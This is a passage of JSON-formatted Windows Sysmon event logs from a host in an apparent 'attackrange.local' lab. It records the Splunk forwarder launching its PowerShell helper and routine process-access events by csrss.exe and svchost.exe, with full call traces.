{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nProcessGuid: {E2A3D6B1-110F-5F25-0000-0010ACF50500}\r\nProcessId: 2876\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","ProcessGuid":"{E2A3D6B1-110F-5F25-0000-0010ACF50500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4152,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-110F-5F25-0000-0010ACF50500}\r\nTargetProcessId: 2876\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-110F-5F25-0000-0010ACF50500}","TargetProcessId":"2876","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4153,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-110F-5F25-0000-0010ACF50500}\r\nTargetProcessId: 2876\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-110F-5F25-0000-0010ACF50500}","TargetProcessId":"2876","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4154,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4157,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4158,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4159,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 